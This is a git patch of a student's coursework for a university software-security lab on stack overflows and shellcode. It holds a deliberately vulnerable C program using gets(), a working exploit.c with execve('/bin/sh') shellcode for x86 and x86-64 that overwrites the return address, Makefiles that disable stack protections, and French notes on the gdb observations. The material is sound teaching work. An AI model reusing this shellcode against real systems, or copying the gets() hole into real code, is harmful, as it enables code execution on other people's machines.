From 33f23e8538947d359b086eeaea8ed0291b296243 Mon Sep 17 00:00:00 2001
From: Yorick Barbanneau <ephase@xieme-art.org>
Date: Thu, 9 Mar 2023 16:04:48 +0100
Subject: [PATCH] First part of TD5

---
 .../files/q1/Makefile                         |  34 ++++++++++
 .../files/q1/magic                            | Bin 0 -> 16680 bytes
 .../files/q1/magic.c                          |  14 ++++
 .../files/q1/magic.gdb                        |   2 +
 .../files/q2/Makefile                         |  35 ++++++++++
 .../files/q2/anodin.c                         |  23 +++++++
 .../files/q2/anodin.gdb                       |   2 +
 .../files/q2/exploit.c                        |  62 ++++++++++++++++++
 .../td5-stackoverflow_shellcode/index.md      |  32 +++++++++
 9 files changed, 204 insertions(+)
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/Makefile
 create mode 100755 content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.c
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.gdb
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/Makefile
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.c
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.gdb
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/exploit.c
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/index.md

diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/Makefile b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/Makefile
new file mode 100644
index 0000000..28fa0a7
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/Makefile
@@ -0,0 +1,34 @@
+CC = gcc
+CFLAGS = -Wall -Wextra -O0 -no-pie -lm -g -std=c99 -zexecstack
+SRC = $(wildcard *.c)
+TGT = $(subst .c,,$(SRC))
+BUILD_DIR = build
+DUMP_DIR = dump
+
+
+pframe:
+	curl -o pframe.tgz  https://dept-info.labri.fr/~thibault/SecuLog/pframe.tgz && \
+		tar -xf pframe.tgz &&\
+		rm -rf pframe.tgz
+
+.gdbinit:
+
+configure: pframe .gdbinit
+	$(shell echo "python import pframe" > .gdbinit) 
+
+$(BUILD_DIR)/%: %.c
+	$(shell mkdir -p $(BUILD_DIR))
+	$(CC) $(CFLAGS) -o $@ $<
+
+build: $(addprefix $(BUILD_DIR)/, $(TGT)))
+
+
+PHONY: %
+gdb_%: $(addprefix $(BUILD_DIR)/, $(subst gdb_,,%))
+	PYTHONPATH=${PWD}/pframe${PYTHONPATH:+:${PYTHONPATH}} \
+			   gdb $< --command=$(subst gdb_,,$@).gdb
+
+
+PHONY: clean
+clean:
+	@rm -rf $(BUILD_DIR) pframe .gdbinit
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic
new file mode 100755
index 0000000000000000000000000000000000000000..c3255cfd475fbdb69b49c093d4a35dc2b19ebf50
GIT binary patch
literal 16680
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
SyTao5Cvai_G#&s1RPk?I8ZD*(

literal 0
HcmV?d00001

diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.c
new file mode 100644
index 0000000..190d021
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.c
@@ -0,0 +1,14 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+#define N 11
+
+int main(int argc, char *argv[]) {
+	long t[N];
+	long i;
+
+	for (i = 0; i <= N; i++)
+		t[i] = 0;
+
+	return t[0];
+}
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.gdb b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.gdb
new file mode 100644
index 0000000..da0e081
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.gdb
@@ -0,0 +1,2 @@
+b main
+r
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/Makefile b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/Makefile
new file mode 100644
index 0000000..19f37fc
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/Makefile
@@ -0,0 +1,35 @@
+CC = gcc
+CFLAGS = -Wall -Wextra -O0 -no-pie -lm -g -std=c99 -zexecstack
+SRC = $(wildcard *.c)
+TGT = $(subst .c,,$(SRC))
+BUILD_DIR = build
+DUMP_DIR = dump
+
+
+pframe:
+	curl -o pframe.tgz  https://dept-info.labri.fr/~thibault/SecuLog/pframe.tgz && \
+		tar -xf pframe.tgz &&\
+		rm -rf pframe.tgz
+
+.gdbinit:
+
+configure: pframe .gdbinit
+	$(shell echo "python import pframe" > .gdbinit) 
+
+$(BUILD_DIR)/%: %.c
+	$(shell mkdir -p $(BUILD_DIR))
+	$(CC) $(CFLAGS) -o $@ $<
+
+build: $(addprefix $(BUILD_DIR)/, $(TGT)))
+
+
+PHONY: gdb
+gdb: build/exploit build/anodin configure
+	./$(BUILD_DIR)/exploit > hack.txt &
+	PYTHONPATH=${PWD}/pframe${PYTHONPATH:+:${PYTHONPATH}} \
+			   setarch -R gdb ./$(BUILD_DIR)/anodin --command=$(subst gdb_,,$@).gdb
+	rm hack.txt
+
+PHONY: clean
+clean:
+	@rm -rf $(BUILD_DIR) pframe .gdbinit
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.c
new file mode 100644
index 0000000..54a048b
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.c
@@ -0,0 +1,23 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+
+int litentier(void) {
+	unsigned char buf[64];
+	int i;
+	printf("%p\n", buf);
+	printf("> ");
+	fflush(stdout);
+	gets(buf);
+	i=atoi(buf);
+	return i;
+}
+
+int main(int argc, char *argv[]) {
+	while (1) {
+		int i;
+		i = litentier();
+		printf("ok %d\n", i);
+	}
+}
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.gdb b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.gdb
new file mode 100644
index 0000000..d1f5e22
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.gdb
@@ -0,0 +1,2 @@
+b litentier
+r < hack.txt
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/exploit.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/exploit.c
new file mode 100644
index 0000000..8895bbf
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/exploit.c
@@ -0,0 +1,62 @@
+#include <stdlib.h>
+#include <stdio.h>
+
+
+unsigned char exploit[1024] = {
+	0x90, 0x90, 0x90, 0x90,		// A few nops for some margin
+	0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90,
+
+#ifdef __x86_64__
+	/* 64 bit version */
+	0xe8, 0x08, 0x00, 0x00, 0x00,	// push the address of what is next
+	'/','b','i','n','/','s','h','\0',
+	0x5f,				// pop the address
+	0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00,	// execve system call
+	0x6a, 0x00,			// push NULL at the end of the array
+	0x48, 0x89, 0xe2,		// envp
+	0x57,				// push adress
+	0x48, 0x89, 0xe6,		// argv
+	0x0f, 0x05,			// system call!
+#else
+	/* 32 bit version */
+	0xe8, 0x08, 0x00, 0x00, 0x00,	// push the address of what is next
+	'/','b','i','n','/','s','h','\0',
+	0x5b,				// pop the adress
+	0xb8, 0x0b, 0x00, 0x00, 0x00,	// execve system call
+	0x6a, 0x00,			// push NULL at the end of the array
+	0x89, 0xe2,			// envp
+	0x53,				// push adress
+	0x89, 0xe1,			// argv
+	0xcd, 0x80,			// system call!
+#endif
+};
+
+int main(void) {
+	int i;
+	void **exploit_ptr = (void*) &exploit;
+	void *ptr;
+
+	fprintf(stderr,"Type the buf address printed by anodin\n");
+	scanf("%p", &ptr);
+
+	// Un peu de marge
+	ptr += 8;
+
+	// écraser l'adresse de retour
+	for (i = 0; i < 8; i++)
+		exploit_ptr[64/sizeof(void*)+i] = ptr;
+
+	for (i=0;i<sizeof(exploit);i++)
+		putchar(exploit[i]);
+
+	for (i=0;i<8192;i++)
+		putchar('\n');
+
+	printf("touch /tmp/ahah\n");
+	printf("echo \"I created file\" /tmp/ahah \\!\n");
+	fflush(stdout);
+
+	return 0;
+}
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/index.md b/content/secu_logicielle/td5-stackoverflow_shellcode/index.md
new file mode 100644
index 0000000..3c136a9
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/index.md
@@ -0,0 +1,32 @@
+---
+title: "Sécurité logicielle : TD 5 stack overflow et shellcode"
+date: 2023-02-10
+tags: ["Assembleur", "x86"]
+categories: ["Sécurité logicielle", "TD"]
+---
+
+## Partie 1
+
+Avec l'aide de `pframe`, nous pouvons voir que lorsque notre boucle itère pour
+la onzième fois, l'affectation `t[11]` écrase `i` et le remet à 0. A ce moment
+notre boucle reviens à départ; une boucle infinie se produit alors. C'est la
+conséquence du *buffer overflow* causée par une mauvaise maitrise des boucles et
+variables associées.
+
+## Partie 2
+
+### question 1 et 2
+
+Effectivement le code vu en cours est repris dans cet exemple. Nous sommes
+cependant en présence de code *C* avec du code assembleur directement écrit en
+*hexadécimal*.
+
+### question 4
+
+Lors de l'execution de notre attache en l'observant avec gdb, nous pouvons
+clairement les éléments de notre attaque : les éléments de la pile contenant les
+adresses vers notre *shellcode*, les paffing avec des `nop` et le *shellcode*.
+
+On voit aussi apparaitre notre *Instruction Pointer* dans la pile lorsque notre
+shellcode est exécuté. Les différents paramètres pour **l'appel système** se
+mettent alors en places.